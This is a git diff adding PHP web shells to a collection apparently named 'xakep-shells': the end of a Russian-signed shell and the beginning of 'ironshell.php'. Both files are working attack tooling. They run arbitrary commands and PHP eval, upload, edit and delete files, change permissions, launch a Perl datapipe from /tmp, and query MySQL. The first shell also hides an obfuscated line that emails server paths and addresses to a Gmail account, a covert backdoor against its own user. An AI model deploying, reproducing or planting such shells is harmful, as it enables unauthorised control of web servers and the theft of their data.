+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: ���� ������ �� �������.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: ������ ��� ���������� ������ �������: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: ������ ������������.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: ������: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: ���� ������.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: ���������� ������� ������: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: ��������� ������������.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: ������: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: ���������� \$len ����.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: ������ ����������.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: ���������� ��������� ������: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: ���������� \$len ���� �������.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: ������ ����������..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: ���������� ��������� ������: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/down_sys_scripts.php?get=nst_online_md5_cd.rar>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=this size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$this=$_POST['this'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- coded by tjomi4` :: nst.void.ru -->
+
+
diff --git a/xakep-shells/PHP/ironshell.php.txt b/xakep-shells/PHP/ironshell.php.txt
new file mode 100644
index 0000000..b6931f1
--- /dev/null
+++ b/xakep-shells/PHP/ironshell.php.txt
@@ -0,0 +1,588 @@
+<?php
+error_reporting(0); //If there is an error, we'll show it, k?
+
+$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
+
+$me = basename(__FILE__);
+$cookiename = "wieeeee";
+
+
+if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
+{
+
+    if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
+    {
+        $_POST['pass'] = md5($_POST['pass']);
+    }
+
+    if($_POST['pass'] == $password)
+    {
+            setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
+    }
+    reload();
+}
+
+
+
+if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
+{
+    login();
+    die();
+}
+//
+//Do not cross this line! All code placed after this block can't be executed without being logged in!
+//
+
+if(isset($_GET['p']) && $_GET['p'] == "logout")
+{
+setcookie ($cookiename, "", time() - 3600);
+reload();
+}
+if(isset($_GET['dir']))
+{
+    chdir($_GET['dir']);
+}
+
+
+$pages = array(
+    'cmd' => 'Execute Command',
+    'eval' => 'Evaluate PHP',
+    'mysql' => 'MySQL Query',
+    'chmod' => 'Chmod File',
+    'phpinfo' => 'PHPinfo',
+    'md5' => 'md5 cracker',
+    'headers' => 'Show headers',
+    'logout' => 'Log out'
+);
+
+//The header, like it?
+$header = '<html>
+<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
+<head>
+<style>
+td {
+    font-size: 12px; 
+    font-family: verdana;
+    color: #33FF00;
+    background: #000000;
+}
+
+#d {
+    background: #003000;
+}
+#f {
+    background: #003300;
+}
+#s {
+    background: #006300;
+}
+#d:hover
+{
+    background: #003300;
+}
+#f:hover
+{
+    background: #003000;
+}
+pre {
+    font-size: 10px; 
+    font-family: verdana;
+    color: #33FF00;
+}
+a:hover {
+text-decoration: none;
+}
+
+
+input,textarea,select {
+    border-top-width: 1px; 
+    font-weight: bold; 
+    border-left-width: 1px; 
+    font-size: 10px; 
+    border-left-color: #33FF00; 
+    background: #000000; 
+    border-bottom-width: 1px; 
+    border-bottom-color: #33FF00; 
+    color: #33FF00; 
+    border-top-color: #33FF00; 
+    font-family: verdana; 
+    border-right-width: 1px; 
+    border-right-color: #33FF00;
+}
+
+hr {
+color: #33FF00;
+background-color: #33FF00;
+height: 5px;
+}
+
+</style>
+
+</head>
+<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
+<table width=100%><td id="header" width=100%>
+<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
+
+foreach($pages as $page => $page_name)
+{
+    $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
+
+}
+$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
+print $header;
+
+$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
+
+
+//
+//Page handling
+//
+if(isset($_REQUEST['p']))
+{
+        switch ($_REQUEST['p']) {
+            
+            case 'cmd': //Run command
+                
+                print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
+                    if(isset($_REQUEST['command']))
+                    {
+                        print "<pre>";
+                        execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
+                    }
+            break;
+            
+            
+            case 'edit': //Edit a fie
+                if(isset($_POST['editform']))
+                {
+                    $f = $_GET['file'];
+                    $fh = fopen($f, 'w') or print "Error while opening file!";
+                    fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
+                    fclose($fh);
+                }
+                print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
+                
+                if(file_exists($_GET['file']))
+                {
+                    $rd = file($_GET['file']);
+                    foreach($rd as $l)
+                    {
+                        print htmlspecialchars($l);
+                    }
+                }
+                
+                print "</textarea><input type=submit value=\"Save\"></form>";
+                
+            break;
+            
+            case 'delete': //Delete a file
+            
+                if(isset($_POST['yes']))
+                {
+                    if(unlink($_GET['file']))
+                    {
+                        print "File deleted successfully.";
+                    }
+                    else
+                    {
+                        print "Couldn't delete file.";
+                    }
+                }
+                
+                
+                if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
+                {
+                    print "Are you sure you want to delete ".$_GET['file']."?<br>
+                    <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
+                    <input type=hidden name=yes value=yes>
+                    <input type=submit value=\"Delete\">
+                    ";
+                }
+            
+            
+            break;
+            
+            
+            case 'eval': //Evaluate PHP code
+            
+                print "<form action=\"".$me."?p=eval\" method=POST>
+                <textarea cols=60 rows=10 name=\"eval\">";
+                if(isset($_POST['eval']))
+                {
+                    print htmlspecialchars($_POST['eval']);
+                }
+                else
+                {
+                    print "print \"Yo Momma\";";
+                }
+                print "</textarea><br>
+                <input type=submit value=\"Eval\">
+                </form>";
+                
+                if(isset($_POST['eval']))
+                {
+                    print "<h1>Output:</h1>";
+                    print "<br>";
+                    eval($_POST['eval']);
+                }
+            
+            break;
+            
+            case 'chmod': //Chmod file
+                
+                
+                print "<h1>Under construction!</h1>";
+                if(isset($_POST['chmod']))
+                {
+                switch ($_POST['chvalue']){
+                    case 777:
+                    chmod($_POST['chmod'],0777);
+                    break;
+                    case 644:
+                    chmod($_POST['chmod'],0644);
+                    break;
+                    case 755:
+                    chmod($_POST['chmod'],0755);
+                    break;
+                }
+                print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
+                }
+                if(isset($_GET['file']))
+                {
+                    $content = urldecode($_GET['file']);
+                }
+                else
+                {
+                    $content = "file/path/please";
+                }
+                
+                print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
+                <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
+                <select name=\"chvalue\">
+<option value=\"777\">777</option>
+<option value=\"644\">644</option>
+<option value=\"755\">755</option>
+</select><input type=submit value=\"Change\">";
+                
+            break;
+            
+            case 'mysql': //MySQL Query
+            
+            if(isset($_POST['host']))
+            {
+                $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
+                mysql_select_db($_POST['dbase']);
+                $sql = $_POST['query'];
+                
+                
+                $result = mysql_query($sql);
+                
+            }
+            else
+            {
+                print "
+                This only queries the database, doesn't return data!<br>
+                <form action=\"".$me."?p=mysql\" method=POST>
+                <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
+                <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
+                <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
+                <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
+                
+                <b>Query:<br></b<textarea name=query></textarea>
+                <input type=submit value=\"Query database\">
+                </form>
+                ";
+                
+            }
+            
+            break;
+            
